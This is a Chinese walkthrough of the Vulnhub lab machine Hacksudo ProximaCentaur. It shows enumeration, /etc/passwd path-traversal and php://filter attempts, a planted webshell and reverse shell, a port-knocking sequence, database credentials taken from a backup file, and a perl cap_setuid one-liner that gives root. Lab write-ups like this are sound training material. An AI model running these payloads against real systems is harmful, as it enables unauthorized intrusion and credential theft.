Vulnhub之Hacksudo ProximaCentaur靶机解题过程
Hacksudo ProximaCentaur
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.2.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.211 08:00:27:c7:29:b1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.211.
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.211 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 23:01 EST
Nmap scan report for localhost (192.168.56.211)
Host is up (0.00021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:C7:29:B1 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.30 seconds
NMAP扫描结果表明目标主机只有一个开放端口。
Get Access
访问目标主机80端口,返回页面中含有admin登录链接,访问该链接可以知道目标运行CMS:pluck 4.7.13,看一下该CMS有无漏洞可以利用:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ searchsploit pluck 4.7.13
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated) | php/webapps/49909.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
该漏洞需要通过用户认证的前提。
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ curl http://192.168.56.211/robots.txt
User-agent: *
Disallow: /data/
Disallow: /docs/
访问http://192.168.56.211/data,返回的页面即为首页,但是从URL来看是不是会有文件包含漏洞:
http://192.168.56.211/?file=hacksudo-proxima-centauri
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ curl http://192.168.56.211/?file=../../../../../../../etc/passwd
A hacking attempt has been detected. For security reasons, we're blocking any code execution.
目标主机有过滤机制,先不尝试绕开这种过滤,扫描以下有无其他目录:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ gobuster dir -u http://192.168.56.211 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.211
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/22 23:10:34 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.211/images/]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.211/docs/]
/files (Status: 301) [Size: 316] [--> http://192.168.56.211/files/]
/data (Status: 301) [Size: 315] [--> http://192.168.56.211/data/]
/planet (Status: 301) [Size: 317] [--> http://192.168.56.211/planet/]
/server-status (Status: 403) [Size: 279]
Progress: 212735 / 220561 (96.45%)===============================================================
2022/11/22 23:10:48 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ curl http://192.168.56.211/files
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.211/files/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.211 Port 80</address>
</body></html>
该目录发现一张图片,将其下载到Kali Linux本地,尝试破解,失败!
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ wget http://192.168.56.211/files/hacksudo.jpg
--2022-11-22 23:11:35-- http://192.168.56.211/files/hacksudo.jpg
Connecting to 192.168.56.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69750 (68K) [image/jpeg]
Saving to: ‘hacksudo.jpg’
hacksudo.jpg 100%[=====================================================>] 68.12K --.-KB/s in 0s
2022-11-22 23:11:35 (299 MB/s) - ‘hacksudo.jpg’ saved [69750/69750]
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ ls
hacksudo.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ steghide extract -sf hacksudo.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ stegseek hacksudo.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.85% (133.2 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ gobuster dir -u http://192.168.56.211 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.211
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/22 23:15:57 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.211/images/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 0] [--> http://192.168.56.211/?file=hacksudo-proxima-centauri]
/login.php (Status: 200) [Size: 1245]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.211/docs/]
/files (Status: 301) [Size: 316] [--> http://192.168.56.211/files/]
/data (Status: 301) [Size: 315] [--> http://192.168.56.211/data/]
/admin.php (Status: 200) [Size: 4584]
/install.php (Status: 200) [Size: 4593]
/robots.txt (Status: 200) [Size: 47]
/planet (Status: 301) [Size: 317] [--> http://192.168.56.211/planet/]
/planet.html (Status: 200) [Size: 1632]
/requirements.php (Status: 200) [Size: 4605]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/flag1.txt (Status: 200) [Size: 64]
Progress: 1101034 / 1102805 (99.84%)===============================================================
2022/11/22 23:17:13 Finished
===============================================================
发现了第1个flag
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ curl http://192.168.56.211/flag1.txt
hey good going ...your very close to root ...can catch me !!!!!
尝试破解admin登录密码,但是hydra没有爆破出来。
http://192.168.56.211/?file=php://filter/convert.base64-encode/resource=/etc/passwd
没有返回信息。
看了以下别人的做法,是注意到dirb扫描出来的/data/trash
──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ curl http://192.168.56.211/data/trash/files/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /data/trash/files</title>
</head>
<body>
<h1>Index of /data/trash/files</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/data/trash/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="shell.phar">shell.phar</a></td><td align="right">2021-06-04 23:43 </td><td align="right"> 17K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.211 Port 80</address>
</body></html>
有个shell.phar文件,是个webshell
访问这个文件,得到webshell,发现存在python3,利用这个python3Spawn一个新的shell出来shell
在kali Linux得到正常的shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.211] 47584
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ProximaCentauri:/var/www/html/data/trash/files$
提权
ww-data@ProximaCentauri:/var/www/html/data/settings$ ps aux | grep knock
ps aux | grep knock
root 14664 0.0 0.0 6680 796 ? Ss 00:33 0:00 /usr/sbin/knockd -i enp0s3
www-data 14678 0.0 0.0 6276 888 pts/0 S+ 00:35 0:00 grep knock
www-data@ProximaCentauri:/var/www/html/data/settings$
为端口敲门程序
www-data@ProximaCentauri:/etc$ ls | grep knock
ls | grep knock
knockd.conf
www-data@ProximaCentauri:/etc$ cat knockd.conf
cat knockd.conf
[options]
UseSyslog
[openSSH]
sequence = 14,29,43
seq_timeout = 15
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 62,40,46
seq_timeout = 15
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
www-data@ProximaCentauri:/etc$
通过查看配置文件得知,需要依次访问14、29、43端口,可启用22端口
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nmap -p 14 -sS 192.168.56.211
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 00:44 EST
Nmap scan report for localhost (192.168.56.211)
Host is up (0.00041s latency).
PORT STATE SERVICE
14/tcp closed unknown
MAC Address: 08:00:27:C7:29:B1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nmap -p 29 -sS 192.168.56.211
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 00:44 EST
Nmap scan report for localhost (192.168.56.211)
Host is up (0.00038s latency).
PORT STATE SERVICE
29/tcp closed msg-icp
MAC Address: 08:00:27:C7:29:B1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nmap -p 43 -sS 192.168.56.211
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 00:44 EST
Nmap scan report for localhost (192.168.56.211)
Host is up (0.00037s latency).
PORT STATE SERVICE
43/tcp closed whois
MAC Address: 08:00:27:C7:29:B1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ sudo nmap -p 22 -sS 192.168.56.211
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 00:44 EST
Nmap scan report for localhost (192.168.56.211)
Host is up (0.00035s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:C7:29:B1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]
└─$ ssh root@192.168.56.211
The authenticity of host '192.168.56.211 (192.168.56.211)' can't be established.
ED25519 key fingerprint is SHA256:eI8yP9LtVsMcwLyNVJCLIT/guic0AroGQyjLmeyJCC8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.211' (ED25519) to the list of known hosts.
#m m # #
# # mmm mmm # m mmm m m mmm# mmm
#mmmm# " # #" " # m" # " # # #" "# #" "#
# # m"""# # #"# """m # # # # # #
# # "mm"# "#mm" # "m "mmm" "mm"# "#m## "#m#"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.hacksudo.com @blackwhole effect #vishal_waghmare @twitter#vishalhwaghmare
#==============================================================================#
#hey dear you might be survive due to blackwhole effect so try 2 get right path#
#------------------------------------------------------------------------------#
did you tried?cont1=^https://github.com/hacksudo/fog-hacksudo/blob/main/blackhole.lst^
root@192.168.56.211's password:
www-data@ProximaCentauri:/var/backups$ cat mysql.bak
cat mysql.bak
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'proximacentauri' );
/** MySQL database username */
define( 'DB_USER', 'alfauser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'passw0rd' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
www-data@ProximaCentauri:/var/backups$
www-data@ProximaCentauri:/var/backups$ mysql -ualfauser -p
mysql -ualfauser -p
Enter password: passw0rd
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| proximacentauri |
+--------------------+
4 rows in set (0.001 sec)
MariaDB [(none)]> use proximacentauri;
use proximacentauri;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [proximacentauri]> show tables;
show tables;
+---------------------------+
| Tables_in_proximacentauri |
+---------------------------+
| authors |
+---------------------------+
1 row in set (0.000 sec)
MariaDB [proximacentauri]> select * from authors;
select * from authors;
+------+---------+-----------------+---------------------+
| id | name | password | email |
+------+---------+-----------------+---------------------+
| 1 | proxima | alfacentauri123 | vishal@hacksudo.com |
+------+---------+-----------------+---------------------+
1 row in set (0.000 sec)
MariaDB [proximacentauri]>
发现了proxima的密码,登录该用户。
ww-data@ProximaCentauri:/var/backups$ su - proxima
su - proxima
Password: alfacentauri123
proxima@ProximaCentauri:~$ id
id
uid=1001(proxima) gid=1001(proxima) groups=1001(proxima)
proxima@ProximaCentauri:~$ sudo -l
sudo -l
-bash: sudo: command not found
proxima@ProximaCentauri:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-la
proxima@ProximaCentauri:~$ cat user.txt
cat user.txt
,-.
___,---.__ /'|`\ __,---,___
,-' \` `-.____,-' | `-.____,-' // `-.
,' | ~'\ /`~ | `.
/ ___// `. ,' , , \___ \
| ,-' `-.__ _ | , __,-' `-. |
| / /\_ ` . | , _/\ \ |
\ | \ \`-.___ \ | / ___,-'/ / | /
\ \ | `._ `\\ | //' _,' | / /
`-.\ /' _ `---'' , . ``---' _ `\ /,-'
`` / \ ,='/ \`=. / \ ''
|__ /|\_,--.,-.--,--._/|\ __|
/ `./ \\`\ | | | /,//' \,' \
/ / ||--+--|--+-/-| \ \
| | /'\_\_\ | /_/_/`\ | |
\ \__, \_ `~' _/ .__/ /
`-._,-' `-._______,-' `-._,-'
user owned
www.hacksudo.com/contact
www.twitter.com/vishalhwaghmare
flag{8b64d2451b7a8f3fd17390f88ea35917}
proxima@ProximaCentauri:~$
linpeas.sh脚本上传至目标主机,修改权限,并执行该脚本:
执行脚本(大红突出显示以下信息):
Files with capabilities (limited to 50):
/home/proxima/proximaCentauriA/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
proxima@ProximaCentauri:/tmp$
proxima@ProximaCentauri:/tmp$ /home/proxima/proximaCentauriA/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
<OSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
id
uid=0(root) gid=1001(proxima) groups=1001(proxima)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 3 root root 4.0K Jun 7 2021 .
drwxr-xr-x 18 root root 4.0K Jun 4 2021 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 4 2021 .local
-rw------- 1 root root 927 Jun 7 2021 .mysql_history
-rw------- 1 root proxima 0 Jun 5 2021 note.txt
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 1.3K Jun 5 2021 root.txt
-rw-r--r-- 1 root root 830 Jun 7 2021 .sshbanner
-rw-r--r-- 1 root root 173 Jun 4 2021 .wget-hsts
# cat root.txt
cat root.txt
proxima centauri ----->
,:
,' |
/ :
--' /
\/ /:/
/ ://_\
__/ /
)'-. /
./ :\
/.' '
'/'
+
'
`.
.-"-
( |
. .-' '.
( (. )8:
.' / (_ )
_. :(. )8P `
. ( `-' ( `. .
. : ( .a8a)
/_`( "a `a. )"'
( (/ . ' )=='
( ( ) .8" +
(`'8a.( _( (
..-. `8P ) ` ) +
-' ( -ab: )
' _ ` (8P"Ya
_( ( )b -`. ) +
( 8) ( _.aP" _a \( \ *
+ )/ (8P (88 ) )
(a:f " `"`
you rooted this server
root flag{e2798af12a7a0f4f70b4d69efbc25f4d}
#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
